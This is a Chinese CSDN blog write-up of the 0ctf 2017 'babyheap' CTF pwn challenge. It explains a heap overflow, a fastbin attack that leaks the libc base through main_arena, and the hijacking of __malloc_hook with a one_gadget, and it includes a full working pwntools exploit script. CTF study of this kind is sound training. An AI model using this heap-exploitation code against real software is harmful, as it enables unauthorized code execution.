0ctf babyheap

最新推荐文章于 2022-09-06 14:54:30 发布
最新推荐文章于 2022-09-06 14:54:30 发布
阅读量475 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/90166668
版权

这个题  一开始 不知道是怎么回事

然后这个程序开了 保护全开  基址随机化  这就要我们自己把libc的基址给泄露出来

泄露的方法我知道的是  把堆 free到 unsortbin的fd和bk指向自身main_arena  然后可以根据 main_arena 的偏移 搞出libc 库

道理都懂 但是怎么做 就不好说了  现在这里就有一道题 

典型的菜单题  然后 看一下大概内容 有没有什么漏洞点

calloc 这个函数有两个参数 一个是 大小 一个是 长度  二者相乘 就是  要申请的大小 

然后calloc 这个函数还会把我们申请的地方自动清空 这里好像没有什么问题 我们去看其它函数的作用

这里 有一个 溢出点 就是他输入的要修改的堆块大小 是我们自己修改的大小 那么我们可以无限修改了

这里好像也没有什么溢出点

好吧 现在就知道了一个溢出点  但是怎么利用呢    如果我们能够泄露出 libc库 那么就很好利用这个程序了 

问题就在于 怎么泄露 一开始没有想到什么好的方法  然后参考了这个链接

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/fastbin_attack/#2017-0ctf-babyheap

然后发现这个这个思路真的好用  修改fd指针 让 heap[2]的指针指向 heap[4]的指针 然后泄露就可以了

这里由于堆块申请对齐 所以  index[4]的堆块起始地址必定是 0x80

那么我们就可以   payload = 0x10 * 'a' + p64(0) + p64(0x21) + p8(0x80)

然后   edit(0,len(payload),payload)    那么 fd 也就指向了 堆块4

可以看到已经指向了  第四个堆块  那么  那我再修改第三个 让 堆块四的大小是   0x21  然后  再add  两个堆块 0x10 

然后  heap[2] 就指向了  4号堆块   那么 我们就胜利了 一半   我们接下来是 想办法让  4号堆块 进入  unsort bin  

引用wiki 的原话 就是 所以该 chunk 不能使 fastbin chunk,也不能和 top chunk 相邻。因为前者会被添加到 fastbin 中,后者在不是 fastbin 的情况下,会被合并到 top chunk 中 

然后我们修改3 让 他的大小是0x91  然后 再在后面申请一个 chunk  然后  然后free了 4  然后 再打印2号的内容就可以get到了 

main_arena

然后就是hook malloc函数  找 one_gadget_addr 就只能根据库去找

然后其他就没有什么了

下面是根据wiki写的脚本

from pwn import *

context.log_level = "debug"
io=process("./babyheap")
elf=ELF("./babyheap")

def add(size):
    io.recvuntil('Command: ')
    io.sendline("1")
    io.recvuntil("Size: ")
    io.sendline(str(size))

def edit(index,size,content):
    io.recvuntil('Command: ')
    io.sendline("2")
    io.recvuntil("Index: ")
    io.sendline(str(index))
    io.recvuntil("Size: ")
    io.sendline(str(size))
    io.recvuntil("Content: ")
    io.sendline(content)
    
def dele(index):
    io.recvuntil('Command: ')
    io.sendline("3")
    io.recvuntil("Index: ")
    io.sendline(str(index))

def show(index):
    io.recvuntil('Command: ')
    io.sendline("4")
    io.recvuntil("Index: ")
    io.sendline(str(index))


if __name__ =="__main__":
    add(0x10)
    add(0x10)
    add(0x10)
    add(0x10)
    add(0x80)
    dele(2)
    dele(1)
    payload = 0x10 * 'a' + p64(0) + p64(0x21) + p8(0x80)
    edit(0,len(payload),payload)
    payload = 0x10 * 'a'+ p64(0) + p64(0x21)
    edit(3,len(payload),payload)
    add(0x10)
    add(0x10)
    payload= 0x10 * 'a'+p64(0)+p64(0x91)
    edit(3,len(payload),payload)
    add(0x80)
    dele(4)
    show(2)
    io.recvuntil('Content: \n')
    unsort_addr=u64(io.recv(8))
    main_arena =unsort_addr-88
    libcbase_addr =main_arena -0x3C4B20
    add(0x60)
    dele(4)
    fake_chunk_addr=main_arena-0x33
    payload=p64(fake_chunk_addr)
    edit(2,len(payload),payload)
    add(0x60)
    add(0x60)
    one_gadget_addr = libcbase_addr + 0x4526a
    payload = 0x13 * 'a' + p64(one_gadget_addr)
    edit(6,len(payload),payload)
    add(0x90)
    #gdb.attach(io)
    io.interactive()
    io.close()

 

 

 

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3790
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2077
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
babyheap_fastbin_attack
playmaker的博客
06-23 233
babyheap-堆溢出之fastbin_attack 首先检查程序保护 保护全开。是一个选单系统 分析程序 void new() { int index; // [rsp+0h] [rbp-10h] signed int size; // [rsp+4h] [rbp-Ch] void *ptr; // [rsp+8h] [rbp-8h] for ( index = 0; i...
0ctfbabyheap题writeup
黑白佩的革命根据地
07-31 456
一个堆题的wp
0CTF-babyheap2017祥讲
Jc
07-26 452
解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 安全机制全部开启了,其实不用慌,对我们做题影响不是很大 运行 ## IDA ...
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF神器_ctf
09-23
【标题】:“CTF神器_ctf” 在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,参与者通过解决各种安全挑战来展示他们的技能。在这个压缩包“CTF神器_ctf”中,重点可能指向了一个名为“dirsearch”的...
ctf拼图例题-puzzle
04-13
在CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的图片,很可能是参赛者需要解读的线索。每个图片可能代表一个...
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统...
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
BUUCTF:0ctf_2017_babyheap
weixin_51055545的博客
01-07 1597
一天一道buu 今天做了这道堆题没有想象的难,毕竟是道1分的题 例行检查 64位程序,保护机制全开的,放到IDA 漏洞分析 漏洞在edit()函数中,我们add()之后,在edit()时,能再次控制size的大小,存在堆溢出。 分析好漏洞后,就开始利用 利用思路和分析 1.我们先利用堆溢出泄露出libc地址 2.劫持fd指针到malloc_hook,覆盖malloc_hook为one_gadget,当再次申请堆块时调用one_gadget,从而get shell 分析 首先堆布局,申请0x100的堆,释放
【攻防世界】babyheap
weixin_43960998的博客
04-05 192
off by null (libc2.23) 1.程序逆向 程序在 add 的 read 中存在一个 off by null,同时 add 时无 size 限制,可以直接申请进 unsorted bin 的 chunk,个数足够用。可以 show,free 正常 2.漏洞利用 和 secret of my heart 一样的利用手法,不再赘述。 记录一下调试 og 的过程。我们可以先尝试所有 og ,如果没有打通的情况下,利用 realloc 调节栈帧,这里可以断在最后触发时的 malloc 处,然后 s
babyheap_0ctf_2017
m0sway的博客
11-25 524
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
0ctf Babyheap 2017
Bill
03-11 6395
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
0CTF 2018 BabyHeap
Bill
04-15 1032
0CTF 2018 Babyheap 前言 上周0CTF临危受命,就做出一道题, 感觉思路很新颖, 分享一下. 题目分析 1. checksec Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: ...
2017/2018-0ctf-babyheap-writeup
【xiaoxiaorenwu's blog】
04-07 768
因为最近2019届0ctf-tctf开始了,想去水一水,特别把2018的babyheap和2017的babyheap做了一下汲取一下经验,感觉两题类型相似,大致思路相同,2018比2017的利用条件更加苛刻一些。所以把两个题目放在一起来写,有助于加深对fastbin_attack的理解,和提高知识运用的灵活性。 首先提供两道题目的二进制文件:2017_0ctf_babyheap 2018...
babyheap_0ctf_2017记录
qq_43710556的博客
09-28 535
Pwn的堆题对新手可真是不友好,这一道简单的堆题,困扰了我整整一周,我才将其弄明白。特此编写此做题记录,来记录做题路上的种种坑,以此纪念自己做出的第一道堆题。 再开始之前推荐两个网站,buuctf 和 ctfwiki。 这道题主要就是考察了一个堆溢出的知识点:fastbin attack 还有一个知识点是:当只有一个 small/large chunk 被释放时,small/large chunk...
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2792
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
ctf从0到1电子书
最新发布
12-14
《CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起自己的CTF技能。 该电子书首先介绍了CTF竞赛的概念和历史,并解释了CTF竞赛的基本流程和常见的攻击手法。接着,它深入解析了网络安全、逆向工程、加密和编程等相关的技术知识,帮助读者建立起坚实的基础。然后,书中提供了大量的实例和练习,让读者可以通过实践快速掌握所学的知识和技能。 通过该电子书的学习,读者可以逐步从CTF的入门级别进阶到中级和高级水平,掌握一系列解决问题的方法和技巧。并且,书中还强调了团队协作和解决问题的思维方式,帮助读者培养了解决实际问题的能力。 总的来说,《CTF从0到1》是一本非常实用的电子书,不仅可以帮助初学者快速入门CTF竞赛,还能帮助中级和高级选手提高他们的技能和水平。它准确把握了读者的需求,并通过丰富的实例和练习帮助他们从零开始建立起自己的CTF技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值